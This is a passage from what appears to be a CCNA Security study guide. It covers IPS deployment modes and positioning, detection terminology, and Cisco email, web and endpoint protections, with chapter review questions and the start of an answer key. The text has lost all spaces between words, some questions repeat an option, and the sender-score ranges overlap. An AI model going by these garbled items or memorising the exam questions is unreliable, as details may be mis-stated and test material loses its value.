AfteranAttackAftertheattack,FireSIGHTprovidesanassessmentoftheattack,containstheattack,andhelpsbringthenetworkbackintoanormalstate.Todothis,itusesseveralfeatures:
FireSIGHTdiscoveryandawareness:Thiscollectsinformationabouthosts,operatingsystems,applications,users,files,networks,geolocationinformation,andvulnerabilitiesthatisusedtoreportindicatorsofcompromise.
Dynamicfileanalysis:CapturedfilescanbesubmittedtotheCiscoCollectiveSecurityIntelligenceCloudforanalysis.ThecloudrunsatestandreturnsathreatscoretotheFireSIGHTManagementCenter.
Connectiondataandsummaries:Connectiondataisinformationaboutdetectedsessions,includingtimestamps,IPaddresses,geolocation,andapplications.
UnderstandingModesofDeploymentTheFireSIGHTManagementCentercanalsomanageothermonitoringdevicessuchasappliances,virtualappliances,andASAfirewallsrunningsoftwarereleaseASA9.2andlater.ItisalsocommonlydeployedinbranchofficesintheformoftheFireSIGHTmoduleintheASA.
ThedevicesmanagedbytheFireSIGHTManagementCenteractinginthesameroleaslegacyIPSsensorscanbedeployedintwomodes.
PassiveThesensorreceivesacopyofthenetworktraffictoanalyzewhiletheoriginaltrafficflowsthroughthenetwork.Becausethesensoronlyreceivesacopy,andbecausebythetimethecopyisanalyzed,theoriginaltrafficislonggone,FireSIGHTcanonlyfunctionasanintrusiondetectionsystem(IDS)whendeployedinthismode.Therearetwowaystoimplementpassivemode.
SPANFigure16.5illustratesthismode.ThesensorisconnectedtoaportontheswitchtowhichalltraffichasbeenmirroredbymakingtheportaSPANport.NoticethatthetrafficflowfromthedeviceinsidethenetworktoadeviceontheInternet(blackdashedline)andthenback(graydashedline)isnotinterrupted.
FIGURE16.5SPAN
TapInthisdeploymentmode,thesensorisimplementedasanetworktap,asshowninFigure16.6.Thetapisplacedbetweentherouterandthelayer3switch.Itprovidesfull-duplexconnectivitybetweenthedevicesandsplitsofftwosimplexmirrorsofthefull-duplextraffic.Alltrafficbetweenthetwodevicesmusttraversethesensor.
FIGURE16.6Tap
InlineInthismode,thesensingdeviceisplacedinthelineoftrafficandanalyzestheoriginaltraffic,notacopyinrealtime.Therefore,itcantakeactionsonthetrafficthatallowittooperateasatrueIPS.Figure16.7showsthismode’soperation.
FIGURE16.7Inlinemode
PositioningoftheIPSwithintheNetworkWhenmakingthiskeydecision,considerthefollowingfactors:
Thefeaturesyouareutilizing(attackdetection,policyenforcement,surveillance,anomalydetection,etc.)
Locationofcriticalassets
Bandwidthutilization
Topology
OutsideOneoftheoptionsistoplacethesensoroutsidetheperimeterfirewall(ASA).Whenplacedhere,thesensorwillgenerateaveryhighnumberofalarmsbecausethisisanexposuretothemostuntrustednetwork,theInternet.Itwillalsogeneratemanyalarmsthatyouwillassesstobefalsepositives(moreonfalsepositivesinthefinalsectionofthischapter)becauseitwillbecomposedoftrafficthattheASAwouldhaveneverallowedintothenetwork.Figure16.8showsthisoption.
FIGURE16.8Outsidedeployment
DMZServersintheDMZareexposedtotheInternetbydesign.Whileplacingasensorherewillhelptoidentifyattacksontheseexposeddevices,keepinmindthatiftheseserversarebeingdeployedaccordingtobestpractices,theywillcontainnosensitiveinformationandwillhavebeensignificantlyhardened.Figure16.9showsthisoption.
FIGURE16.9DMZdeployment
InsideThisisapositioningthatyieldsthemostbenefit.WhiletheperimeterASAcanprovideprotection,keepinmindthattheusersoftheseinteriordeviceshavevaryinglevelsofsecurityexpertise.Thisisalsowhereallcriticaldatawillbelocated.Therefore,thiswillbethebestplacetodeployasinglesensor.Figure16.10showsthisoption.Inthisoption,FireSIGHTisdeployedasamoduleintheASAandisexaminingtrafficdestinedfortheinternalnetwork.
FIGURE16.10Insidedeployment
UnderstandingFalsePositives,FalseNegatives,TruePositives,andTrueNegativesAllIPSsandIDSs,includingFireSIGHT,makeincorrectassessments.Insomecases,theyfailtoidentifyattacksormalicioustraffic.Inothercases,theyalertyouthatanattackisunderwaywhenthatisnotthecase.Theyalsomakecorrectassessments,alertingyoutoarealattackorignoringtrafficthatisnotanattack.Therearetermsusedtodescribeallfourofthesescenarios.Table16.1identifiestheseterms.KeepinmindthattruemeanstheIPSwascorrectinitsassessmentandfalsemeansitwasincorrectinitsassessment.
TABLE16.1Assessmentterms
Term MeaningTruepositive TheIPSalertedyoutoanattackthatisreal.Truenegative TheIPSdidnotalertyoutoanonexistentattack.Falsepositive TheIPSalertedyoutoanattackthatisnonexistent.Falsenegative TheIPSdidnotalertyoutoarealattack.
SummaryInthischapter,youlearnedaboutsomegeneralIPSconcepts,suchasnetwork-basedandhost-baseddeployments;modesofdeploymentsuchasinline,SPAN,andtap;andthepositioningoptionsavailable.Youalsowereintroducedtofalsepositivesandfalsenegativesandtheinterpretationofthese.Thechaptercoveredhowbothrulesandsignaturesareusedintheprocessofidentifyingpotentialattacks.Finallyassessmentterms(falsepositive,falsenegative,etc.)werediscussed.
ExamEssentialsDefineIPSterminology.Thesetermsincludethreat,risk,vulnerability,exploit,andzero-daythreat.
DescribetheactionsofwhichanIPSiscapable.Someexamplesoftheseactionsaredrops,whichmeanstheIPSquietlydropsthepacketsinvolved;reset,whichsendsapacketwiththeRSTflag,whichendsanyTCPconnection;shun,whichaccomplishesthesamepurposeasaresetfornon-TCPconnections;andblock,wheretheIPSdirectsanotherdevice(arouterorfirewall)toblockthetraffic.
Differentiatenetwork-basedandhost-basedIPS.Ahost-basedintrusionpreventionsystem(HIPS)isinstalledonthedevice(forthepurposesofthisdiscussion,aserver),andthesystemfocusessolelyonidentifyingattacksonthatdeviceonly.Thisisincontrasttoanetwork-basedsystem,whichmonitorsalltrafficthatgoesthroughitlookingforsignsofattackonanymachineinthenetwork.
IdentifyevasiontechniquesemployedtodefeatanIPS.Theseincludepacketfragmentation,injectionattacks,andalternatestringexpressions.
ListfourcategoriesoffunctionsofwhichFireSIGHTiscapable.Thesefunctionsincludedetection,learning,adapting,andacting.
DescribethedeploymentmodesofanIPS.Theseincludepassivemodes,suchasSPANandtap,wherethedevicecanonlyoperateanIDS.Italsoincludesinlinemode,inwhichthedevicecantakeactionsontrafficasatrueIPS.
ReviewQuestions1. Whichofthefollowingisanidentifiedsecurityweaknesstowhichanyspecific
environmentmayormaynotbevulnerable?
A. Threat
B. Risk
C. Vulnerability
D. Exploit
2. UsingwhichactiondoestheIPSquietlydropthepacketsinvolved?
A. Drop
B. Reset
C. Shun
D. Block
3. Whichofthefollowingisnotadrawbackofahost-basedIPS?
A. Ahighnumberoffalsepositivescancausealaxattitudeonthepartofthesecurityteam.
B. Encryptedpacketscannotbeanalyzed.
C. Itcannotmonitoranyinternalactivitythatoccurswithinasystem.
D. Itcannotaddressauthenticationissues.
4. WhichevasiontechniquedividesthepacketintosmallerpiecescontainingthemaliciouscodesothatitbecomesdifficultfortheIPStorecognizethecode?
A. Packetfragmentation
B. Injectionattacks
C. Injectionattacks
D. Cross-sitescripting
5. WhichofthefollowingisnotoneofthefourcategoriesoffunctionsofwhichFireSIGHTiscapable?
A. Detection
B. Learning
C. Adapting
D. Block
6. Whichofthefollowingisanythreatnotyetremediatedbymalwarevendorsorsoftware
vendors?
A. Zero-dayattack
B. Risk
C. Vulnerability
D. Exploit
7. WhichcapabilityofFireSIGHTisaimedatmalware?
A. Blacklisting
B. AMP
C. SNORTtechnology
D. Discoveryandawareness
8. Whichdeploymentmodehasthesensorconnectedtoaportontheswitchtowhichalltraffichasbeenmirrored?
A. SPAN
B. Tap
C. Inline
D. Promiscuous
9. Whichevasiontechniquereliesonthefactthatmanyprotocols’informationcanbecommunicatedorexpressedinmultipleways?
A. Packetfragmentation
B. Bufferoverflows
C. Injectionattacks
D. Cross-sitescripting
10. Whichofthefollowingissusceptibletoanexternalthreatthatadeviceorsystemmaypossess?
A. Zero-dayattack
B. Risk
C. Vulnerability
D. Exploit
11. UsingwhichactiondoestheIPSaccomplishthesamepurposeasaresetfornon-TCPconnections?
A. Drop
B. Reset
C. Shun
D. Block
12. Inwhichdeploymentmodeisthesensorplacedinthelineoftraffictoanalyzetheoriginaltraffic,notacopyinrealtime?
A. SPAN
B. Tap
C. Inline
D. Promiscuous
13. InwhichpositioningoptionwilltheIPSsensorgenerateaveryhighnumberofalarms?
A. Outside
B. DMZ
C. Inside
D. Remote
14. Whichofthefollowingoccurswhenathreatandavulnerabilitybothexistandathreatactortakesadvantageofthesituation?
A. Zero-dayattack
B. Risk
C. Vulnerability
D. Exploit
15. UsingwhichactiondoestheIPSdirectanotherdevice(arouterorfirewall)toblockthetraffic?
A. Drop
B. Reset
C. Shun
D. Block
16. Inwhichdeploymentmodeisthesensorplacedbetweentwolayer3devicesprovidingfull-duplexconnectivitybetweenthedevicesandsplittingofftwosimplexmirrorsofthefull-duplextraffic?
A. SPAN
B. Tap
C. Inline
D. Promiscuous
17. WhichevasiontechniqueinsertsdatathatwillbeacceptedbytheIPSbutwillbeignoredbythetargetsystem?
A. Packetfragmentation
B. Bufferoverflow
C. Injectionattacks
D. Cross-sitescripting
18. Whichofthefollowingisadrawbackofnetwork-basedIPS?
A. Ahighnumberoffalsepositivescancausealaxattitudeonthepartofthesecurityteam.
B. Encryptedpacketscannotbeanalyzed.
C. Itcannotmonitoranyinternalactivitythatoccurswithinasystem.
D. Itcannotaddressauthenticationissues.
19. UsingwhichactiondoestheIPSendanyTCPconnection?
A. Drop
B. Reset
C. Shun
D. Block
20. Whichofthefollowingiscreatedwhenathreatexiststowhichasystemisvulnerable?
A. Zero-dayattack
B. Risk
C. Mitigation
D. Exploit
Chapter17ContentandEndpointSecurityCISCOCCNASECURITYEXAMOBJECTIVESCOVEREDINTHISCHAPTER:
7.1Describemitigationtechnologyforemail-basedthreats
Spamfiltering,anti-malwarefiltering,DLP,blacklisting,emailencryption
7.2Describemitigationtechnologyforweb-basedthreats
Localandcloud-basedwebproxies
Blacklisting,URLfiltering,malwarescanning,URLcategorization,webapplicationfiltering,TLS/SSLdecryption
7.3Describemitigationtechnologyforendpointthreats
Anti-virus/anti-malware
Personalfirewall/HIPS
Hardware/softwareencryptionoflocaldata
Endpointdevicesinthenetworksuchaslaptops,printers,workstations,scanners,cameras,andothersuchdevicesrepresentoneofourbiggestchallengesinsecuringtheenvironment.First,therearesomanymoreofthesethanthereareinfrastructuredevices.Moreover,thesedevicesaremostlikelyinthehandsofuserswhoeitherlacksecurityknowledgeorjustdon’tcareaboutit.Inthischapter,you’lllearnhowtoovercomethesechallengesandsecuretheendpointsintheenvironment.
Inthischapter,youwilllearnthefollowing:
Mitigationtechnologyforemail-basedthreats,includingSPAMfiltering,anti-malwarefiltering,datalossprevention(DLP),blacklisting,andemailencryption
Mitigationtechnologyforweb-basedthreats,includinglocalandcloud-basedwebproxies,blacklisting,URLfiltering,malwarescanning,URLcategorization,webapplicationfiltering,andTLS/SSLdecryption
Mitigationtechnologyforendpointthreats,includingantivirus/anti-malware,personalfirewall/HIPS,andhardware/softwareencryptionoflocaldata
MitigatingEmailThreatsThreatstoemailstrikeattheveryheartofyourenterprisecommunicationsystem.Ithasbecomeevidentthateventech-savvyuserscanfallpreytothesethreats.Inthissection,you’lllearnaboutafewmethodsyoucanusetomitigatethesethreats.Thesemethodsarenotmutuallyexclusive,andwhendeployedtogether,theystandasagoodexampleofexercisingtheprincipleofalayereddefenseordefenseindepth.Followingthat,you’lllearnaboutthewaystheCiscoEmailSecurityAppliance(ESA)canaddressthesethreats.
SpamFilteringSpamisbothanannoyancetousersandanaggravationtoemailadministratorswhomustdealwiththeextraspacethespamtakesupontheservers.Spamfiltersaredesignedtopreventspamfrombeingdeliveredtomailboxes.Theissuewithspamfiltersisthatoftenlegitimateemailismarkedasspam.Findingtherightsettingcanbechallenging.Usersshouldbeadvisedthatnofilterisperfectandthattheyshouldregularlycheckquarantinedemailforlegitimateemails.
Reputation-basedfilteringreliesontheidentificationofemailserversthathavebecomeknownforsendingspam.Whenasystemcandothis,itmustrelyonsomeservicefordevelopingthese“reputations.”Asyouwillseelater,anexampleistheCiscoSenderBase.ThisisthesystemtheCiscoEmailSecurityAppliance(ESA)uses.Thisrepositorymanagesreputation“scores”forserversbasedonanymaliciousactivityinwhichtheserverisreportedtohavebeeninvolved.
Context-BasedFilteringContext-basedfilteringfiltersthemessageandattachmentsforsenderidentities,messagecontent,embeddedURLs,andemailformatting.Thesesystemsusealgorithmstoexaminetheseitemstoidentifyspam.
Anti-malwareFilteringEmailcanalsointroducemalwareintotheenvironmentthroughbothmaliciousattachmentsanddeceptivelinksinemails.Whileusertrainingisthebestapproachtopreventingemail-basedmalware,weknowthatitdoesn’talwayswork.Evensecurityprofessionalshaveinadvertentlyclickedmaliciouslinksandattachmentsbymistake.Toaugmenttraining,theexaminationofallemailformalwareandthefilteringofsuchmaliciousmailshouldbepartsofprovidingsecureemail.
DLPDataleakageoccurswhensensitivedataisdisclosedtounauthorizedpersonneleitherintentionallyorinadvertently.Datalossprevention(DLP)softwareattemptstopreventdataleakage.Itdoesthisbymaintainingawarenessofactionsthatcanandcannotbetakenwithrespecttoadocument.Forexample,itmightallowprintingofadocumentbutonlyatthe
companyoffice.Itmightalsodisallowsendingthedocumentthroughemail.DLPsoftwareusesingressandegressfilterstoidentifysensitivedatathatisleavingtheorganizationandcanpreventsuchleakage.Anotherscenariomightbethereleaseofproductplansthatshouldbeavailableonlytothesalesgroup.Thepolicyyoucouldsetforthatdocumentisasfollows:
Itcannotbeemailedtoanyoneotherthansalesgroupmembers.
Itcannotbeprinted.
Itcannotbecopied.
TherearetwolocationsatwhichDLPcanbeimplemented.
NetworkDLPInstalledatnetworkegresspointsneartheperimeter,networkDLPanalyzesnetworktraffic.
EndpointDLPEndpointDLPrunsonend-userworkstationsorserversintheorganization.
Youcanusebothpreciseandimprecisemethodstodeterminewhatissensitive.
PrecisemethodsThesemethodsinvolvecontentregistrationandtriggeralmostzerofalse-positiveincidents.
ImprecisemethodsThesecanincludekeywords,lexicons,regularexpressions,extendedregularexpressions,metadatatags,Bayesiananalysis,andstatisticalanalysis.
ThevalueofaDLPsystemresidesinthelevelofprecisionwithwhichitcanlocateandpreventtheleakageofsensitivedata.
BlacklistingBlacklistingidentifiesbadsenders.Whitelistingoccurswhenalistofacceptablee-mailaddresses,Internetaddresses,websites,applications,orotheridentifiersareconfiguredasgoodsendersorasallowed.Graylistingissomewhereinbetweenthetwowhenanentitycannotbeidentifiedasawhitelistorblacklistitem.Inthecaseofgraylisting,thenewentitymustpassthroughaseriesofteststodeterminewhetheritwillbewhitelistedorblacklisted.Whitelisting,blacklisting,andgraylistingarecommonlyusedwithspamfilteringtools.
EmailEncryptionEmailtraffic,likeanyothertraffictype,canbecapturedinitsrawformwithaprotocolanalyzer.Iftheemailiscleartext,itcanberead.Forthisreason,encryptionshouldbeusedforallemailsofasensitivenature.Whilethiscanbedoneusingthedigitalcertificateoftheintendedrecipient,thisistypicallypossibleonlyiftherecipientispartofyourorganizationandyourcompanyhasapublickeyinfrastructure(PKI).Manyemailproductsincludenativesupportfordigitalsigningandencryptionofmessagesusingdigitalcertificates.
WhileitispossibletouseemailencryptionprogramslikePrettyGoodPrivacy(PGP),itisconfusingformanyuserstousetheseproductscorrectlywithouttraining.Anotheroptionistouseanencryptionapplianceorservicethatautomatestheencryptionofemail.Regardlessof
thespecificapproach,encryptionofmessagesistheonlymitigationforinformationdisclosurefromcapturedpackets.
CiscoEmailSecurityApplianceTheCiscoEmailSecurityAppliancecanaddresseachoftheseconcerns.ThefeaturesthataddressemailissuesintheESAarecoveredinthissection.AttheendofthesectionisadiscussionofthemessageflowwhenusingESA.
ReputationandContext-BasedFilteringESAperformsbothtypesoffiltering.WhenutilizingtheCiscoSenderBase,theactionstakenbyESAdependonthereputationscoreofthesource.Ifthesenderscoreisbetween–1and+10,theemailisaccepted.Ifitis–1and–3,theemailisacceptedbutadditionalemailsarethrottled.Ifitisbetween–10and–3,itisblocked.
VirusesandAnti-malwareESAusesamultilayerapproachtothisissue.Thethreelayersofdefenseareasfollows:
OutbreakFiltersDownloadedfromtheCiscoSenderBase.Thesefiltersaregeneratedbywatchingglobalemailtrafficpatternsandlookingforsignsofanoutbreak.Whenanemailisreceivedfromaserveronthelist,itisquarantineduntilantivirussignaturesareupdatedthataddresstherisk.
AntivirusSignaturesUsedinthesamewayanyanti-malwareproductusesthem:toidentifythepresenceofmalwareintheemail.
OutboundScanningScansemailthatisleavingforthepresenceofmalware.
EmailDataLossPreventionandEncryptionESA’sDLPfeaturesuserulesforidentifyingclassesofsensitiveinformationsuchaspersonallyidentifiableinformation(PII),paymentcardnumbers,bankroutingnumbers,financialaccountinformation,governmentIDnumbers,personalnames,addressesandphonenumbers,andhealthcarerecords.Moreover,youcandesignyourownclassesthatincludedatanotinthesecategories.Encryptionisalsopossibletoprotectanysensitiveinformationthatmustbesent.
AdvancedMalwareProtectionAdvancedMalwareProtection(AMP)isthemalwarecomponentinESAthatusesacombinationofseveraltechnologiestoprotectyoufromemail-basedmalware.
FileReputationAfingerprintofeveryfilethattraversestheCiscoemailsecuritygatewayissenttoAMP’scloud-basedintelligencenetworkforareputationverdict.Basedontheseresults,youcanblockmaliciousfilesidentifiedashavingabadreputation.
FileRetrospectionSometimesfilesenterthenetworkandarelateridentifiedasbeingathreat.
Thisallowsfortheidentificationandremovalofthesefileslater.Ifmaliciousbehaviorisspottedlater,AMPsendsaretrospectivealertsothatyoucancontainandremediatethemalware.ThisprocessisdepictedinFigure17.1.
FIGURE17.1Fileretrospection
FileSandboxingThisprovidestheabilitytoanalyzefilesthattraversethegateway.Theninthesafesandboxedenvironment,AMPcanobtaindetailsaboutthethreatlevelofthemalwareandcommunicatethatinformationtotheCiscoTalosintelligencenetworktoupdatetheAMPclouddataforall.
ESAMessageFlowESAperformsitsjobbyactingasamessagetransferagent(MTA)intheemailsystem.Anothernameforthisfunctionisemailrelay.Figure17.2showsanormalinboundmessageflow.
FIGURE17.2ESAinbound
Figure17.3showsanormaloutboundmessageflow.
FIGURE17.3ESAoutbound
PuttingthePiecesTogetherThevariouscomponentsthatESAbringstobearinitsroleasanemailsecurityutilityworktogetherinanintegratedfashion,asshowninFigure17.4,whichishowESAoperatesagainstincomingemail.
FIGURE17.4Incomingmailprocessing
Regardingemailthatisleavingtheorganization,theoperationsofthesecomponentsaredepictedinFigure17.5.
FIGURE17.5Outgoingmailprocessing
MitigatingWeb-BasedThreatsAnotherthreatthatpresentsitselftomostenterprisesisaimedattheirwebservices.Whilenoteveryorganizationhastheneedforane-commerceserver,almosteveryorganizationhasawebsiteorsometypeofwebpresence.Evenadefacingofapublicwebsite,whilenotcostlyfromamonetarystandpoint,hurtsthereputationandimageofanorganization.
Oneofthecommonwaysofaddressingthreatsagainstwebapplicationsandthewebserversoftwareuponwhichtheyoperateisawebproxy.ProxyserversingeneralstandbetweeninternalusersorinternalapplicationsandpotentiallymaliciousrequestscomingfromtheInternet.WebproxiesareatypeofproxythatstandsbetweenawebapplicationandwebrequestcomingfromtheInternet.Thissectiondiscusseswebproxiesandthefunctionstheyperform.
UnderstandingWebProxiesProxyserverscanbeappliances,ortheycanbeinstalledonaserveroperatingsystem.Theseserversactlikeaproxyfirewallinthattheycreatethewebconnectionbetweensystemson
theirbehalf,buttheycantypicallyallowanddisallowtrafficonamoregranularbasis.Forexample,aproxyservermayallowthesalesgrouptogotocertainwebsiteswhilenotallowingthedataentrygroupaccesstothosesamesites.ThefunctionalityextendsbeyondHTTPtoothertraffictype,suchasFTPtraffic.
Proxyserverscanprovideanadditionalbeneficialfunctioncalledwebcaching.Whenaproxyserverisconfiguredtoprovidewebcaching,itsavesacopyofallwebpagesthathavebeendeliveredtointernalcomputersinawebcache.Ifanyuserrequeststhesamepagelater,theproxyserverhasalocalcopyandneednotspendthetimeandefforttoretrieveitfromtheInternet.Thisgreatlyimproveswebperformanceforfrequentlyrequestedpages.
Fromadeploymentperspective,webproxiescanbeimplementedintwoways.
LocalAlocalproxyisonethatisinstalledonthepremisesinwhichalloftheprocessingoccursonthelocalwebproxy.
Cloud-BasedAcloud-basedwebproxyisonethattransmitsthetraffictoacloudlocationwherealltheoperationsthatwouldoccuronalocalwebproxyoccurinthecloud.Insomecases,thisofferstheadvantageofadditionalintelligenceservicesthatcanaggregateandanalyzetelemetrydatafrombillionsofwebrequests,malwaresamples,andemergingattackmethods.
CiscoWebSecurityApplianceTheCiscoWebSecurityAppliance(WSA)isawebproxythatintegrateswithothernetworkcomponentstomonitorandcontroloutboundrequestsforwebcontent.TrafficcanbedirectedtotheWSAexplicitlyontheendhostorbyusingWebCacheControlProtocolonaninlinedeviceliketheperimeterrouter.ThefeaturesitprovidesarecoveredinthissectionandwillbefollowedbyadescriptionoftrafficflowwhenusingaWSA.
BlacklistingBlacklistingandwhitelistingcanbeusedtocreateandsupporttheacceptableusepolicy(AUP)oftheorganization.Moreover,ithelpstopreventmalwarefrommalicioussitesfromenteringthenetwork.
URLFilteringTheWSAreputationfiltersoperatemuchlikethereputationfiltersusedinESA,withthedifferencebeingthattheyoperateagainstwebdomainsratherthanemailsources.ByleveragingCiscoSecurityIntelligenceOperations(SIO),CiscoIronportreputationfiltersanalyzemorethan50webandnetworkparameterstoevaluateawebsite’strustworthiness.
MalwareScanning
TheWSAanti-malwaresystemusesmultiplescanningenginesinasingleappliance.ItusestheDynamicVectoringandStreamingEngineandverdictenginesfrombothWebRootandMcAfee.
URLCategorizationTheCiscoURLfilterscanalsobemanagedusingaccesspoliciesbasedon52predefinedcategoriesandanunlimitednumberofcustomercategoriesofsites.Thesecanbeusedalongwithtime-basedpolicestoaddadditionalflexibility.
WebApplicationFilteringWSAusesApplicationVisibilityandControl(AVC)toallowforthecontroloftheuseofwebapplications.GranularpolicycontrolallowsadministratorstopermittheuseofapplicationssuchasDropboxorFacebookwhileblockingusersfromactivitiessuchasuploadingdocumentsorclickingtheLikebutton.
TLS/SSLDecryptionInCiscoAsyncOS9.0.0-485,theoperatingsysteminWSA,youcannowenableanddisableSSLv3andvariousversionsofTLSforseveralservices.DisablingSSLv3forallservicesisrecommendedforbestsecurity.Youalsocanenableaprotocolfallbackoption.
MitigatingEndpointThreatsThissectiondiscussestheprotectionofendpoints.Manyoftheitemsdiscussedinthissectioncanbemanagedmanuallyorwiththird-partytools,butmanyoftheitemscanbemanagedautomaticallyusingtheIdentityServicesEngine(ISE).BeforewediscussthesecuritymeasuresinthissectionandtheirpotentialrelationshipwithISE,let’stakeabrieflookatISE.
CiscoIdentityServicesEngine(ISE)Finally,iftheorganizationisimplementingaBYODpolicy,itcanstreamlinethiswithself-serviceonboardingandmanagement.Whilemanyofthesefeaturesarebeyondthescopeofthisbook,wearegoingtodiscusshowitcanhandlethesettingsinthissection.
Antivirus/Anti-malwareTheCiscoISEpostureserviceinterrogatesadevicerequestingaccessforinformationregardingthepresenceofandproperconfigurationofantivirusand/oranti-malwaresoftware.Italsochecksforthepresenceofthelatestavailableupdates.Onlywhenthemachineisfullycompliantisitallowedfullaccesstothenetwork.
PersonalFirewallWhiletheCiscoISEpostureserviceverifiesthepresenceofandproperconfigurationofantivirusand/oranti-malwaresoftware,itdoesn’tstopthere.Itcanalsoverifythefunctionand
settingsofthepersonalfirewall.Itcancomparethiswithabaselineforcomplianceinthesamewayitverifiestheantivirusand/oranti-malwaresoftware.
Hardware/SoftwareEncryptionofLocalDataFinally,sensitivedatalocatedinendpointsshouldbesecuredwitheitherhardwareorsoftwareencryption.CiscoISEcanbeusedtoimplementamobilemanagementsolutionthatcanrequireencryptionofthestorageinbotheasilystolenmobiledevicesandotherdevicesthatmaycontainsensitiveinformation.
HIPSWhilenotafunctionthatcanbecontrolledthroughISEorTrustSec,ahost-basedIPS(HIPS)monitorstrafficonasinglesystem.Itsprimaryresponsibilityistoprotectthesystemonwhichitisinstalled.AnHIPStypicallyworkscloselywithanti-malwareproductsandhostfirewallproducts.Theygenerallymonitortheinteractionofsitesandapplicationswiththeoperatingsystemandstopanymaliciousactivityor,insomecases,asktheusertoapprovechangesthattheapplicationorsitewouldliketomaketothesystem.
Thesesystemscanuseseveralmethodsofdetectingintrusions.Thetwomainmethodsareasfollows:
Signaturebased:Analyzestrafficandcomparespatterns,calledsignatures,thatresidewithintheIDSdatabase.Thisrequiresconstantupdatingofthesignaturedatabase.
Anomalybased:Analyzestrafficandcomparesittonormaltraffictodeterminewhetherthetrafficisathreat.Thismeansanytrafficoutoftheordinarywillsetoffanalert.
SummaryInthischapter,youlearnedmitigationtechniquesavailablewhenusingtheCiscoEmailSecurityAppliance.Thisincludedreputationandcontext-basedfiltering.YoualsowereintroducedtotheCiscoWebSecurityAppliance,whichcanuseblacklisting,URLfiltering,andmalwarescanningtosecurewebtrafficandwebapplications.Finally,thechapterdiscussedendpointprotectionprovidedbytheCiscoIdentityServicesEngineandCiscoTrustSectechnology.
ExamEssentialsIdentifytheprocessesusedbyCiscoESAtoprotectemail.Theseprocessesincludespamfiltering,reputation-basedfiltering,context-basedfiltering,anti-malwarefiltering,datalossprevention,blacklisting,andemailencryption.
DescribetheactionsofwhichtheCiscoWebSecurityApplianceiscapable.Someexamplesoftheseactionsareblacklisting,URLfiltering,malwarescanning,URLcategorization,webapplicationfiltering,andTLS/SSLdecryption.
Differentiateendpointthreats.Thesethreatsincludevirusesandmalware,datadisclosure,peer-to-peerattacks,andunauthorizedaccess.
IdentifytechniquesemployedbytheCiscoIdentityServicesEngine.Theseincludeaccessmanagement,802.1x,healthandpatchassessment,andverificationofsettingsinthepersonalfirewall.
ReviewQuestions1. Whichofthefollowingreliesontheidentificationofemailserversthathavebecome
knownforsendingspam?
A. Context-basedfiltering
B. Reputation-basedfiltering
C. Data-basedfiltering
D. Domain-basedfiltering
2. Whichofthefollowingoccurswhensensitivedataisdisclosedtounauthorizedpersonneleitherintentionallyorinadvertently?
A. Dataleakage
B. Dataegress
C. Informationcorruption
D. Unintendedrelease
3. Whichofthefollowingisinstalledatnetworkegresspointsneartheperimeter?
A. ClientDLP
B. NetworkDLP
C. EndpointDLP
D. CompositeDLP
4. Whichofthefollowingtriggeralmostzerofalse-positiveincidents?
A. Precisemethods
B. Completemethods
C. Imprecisemethods
D. Sparsemethods
5. WithwhichsenderscoredoesESAacceptanemail?
A. Between–1and+10
B. Between–1and–3
C. Between–10and–3
D. Between+10and+20
6. WhichofthefollowingisthemalwarecomponentinESA?
A. AMP
B. MAP
C. CMP
D. EMP
7. WhichcapabilityofAMPsendsafingerprintofeveryfilethattraversestheCiscoemailsecuritygatewaytoAMP’scloud-basedintelligencenetwork?
A. Filereputation
B. Fileretrospection
C. Filesandboxing
D. Fileexamination
8. Whichofthefollowingusesreal-timeanalysisonavast,diverse,andglobaldatasettodetectURLsthatcontainsomeformofmalware?
A. SPAN
B. WBRS
C. WCCP
D. SIO
9. Whichofthefollowingisawebproxythatintegrateswithothernetworkcomponentstomonitorandcontroloutboundrequestsforwebcontent?
A. ESA
B. AMP
C. WSA
D. ISE
10. Whichcomponentanalyzesmorethan50webandnetworkparameterstoevaluateawebsite’strustworthiness?
A. CiscoIronport
B. DynamicVectoringandStreamingEngine
C. WebCacheControlProtocol
D. MessageTransferAgent(MTA)
11. WithwhichsenderscoredoesESAblocktheemail?
A. Between–1and+10
B. Between–1and–3
C. Between–10and–3
D. Between+10and+20
12. WhichcapabilityofAMPprovidestheabilitytoanalyzefilesthattraversethegateway?
A. Filereputation
B. Fileretrospection
C. Filesandboxing
D. Fileexamination
13. WhichofthefollowingusestheDynamicVectoringandStreamingEngine?
A. ESA
B. AMP
C. WSA
D. ISE
14. WhichofthefollowingallowsadministratorstopermittheuseofapplicationssuchasDropboxorFacebook?
A. ESA
B. AMP
C. WSA
D. AVC
15. WhichofthefollowingcanprovideAAAservicessothatyoucandeploy802.1xsecurity?
A. ESA
B. ISE
C. WSA
D. AVC
16. WhichcapabilityofAMPallowsfortheidentificationandremovalofthesefilesaftertheyareaccepted?
A. Filereputation
B. Fileretrospection
C. Filesandboxing
D. Fileexamination
17. WithwhichsenderscoredoesESAaccepttheemailbutadditionalemailsarethrottled?
A. Between–1and+10
B. Between–1and–3
C. Between–10and–3
D. Between+10and+20
18. Whichofthefollowingcanincludekeywords,lexicons,andregularexpressions?
A. Precisemethods
B. Completemethods
C. Imprecisemethods
D. Sparsemethods
19. Whichofthefollowingisinstalledonend-userworkstations?
A. ClientDLP
B. NetworkDLP
C. EndpointDLP
D. CompositeDLP
20. Whichofthefollowingfiltersthemessageandattachmentsforsenderidentities,messagecontent,embeddedURLs,andemailformatting?
A. Context-basedfiltering
B. Reputation-basedfiltering
C. Data-basedfiltering
D. Domain-basedfiltering
AppendixAnswerstoReviewQuestions
Chapter1:UnderstandingSecurityFundamentals1. D.Accountability,althoughimportant,isnotpartoftheCIAtriad.TheCIAtriadincludes
confidentiality,integrity,andavailability.
2. A.Theprincipleofleastprivilegerequiresthatauserorprocessisgivenonlytheminimumaccessprivilegeneededtoperformaparticulartask.Itsmainpurposeistoensurethatusershaveaccessonlytotheresourcestheyneedandareauthorizedtoperformonlythetaskstheyneedtoperform.
3. B.Athreatoccurswhenvulnerabilityisidentifiedorexploited.Athreatwouldoccurwhenanattackeridentifiedthefolderonthecomputerthathasaninappropriateorabsentaccesscontrollist.
4. D.NISTSP800-30identifiesthefollowingstepsintheriskmanagementprocess:
1. Identifytheassetsandtheirvalue.
2. Identifythreats.
3. Identifyvulnerabilities.
4. Determinelikelihood.
5. Identifyimpact.
5. B.Sensitivityisameasureofhowfreelythedatacanbehandled.Somedatarequiresspecialcareandhandling,especiallywheninappropriatehandlingcouldresultinpenalties,identitytheft,financialloss,invasionofprivacy,orunauthorizedaccessbyanindividualormanyindividuals.
6. C.Thesearetypicalcommercialclassifications:
1. Confidential
2. Private
3. Sensitive
4. Public
7. C.TheTrafficLightProtocolclassificationsare:
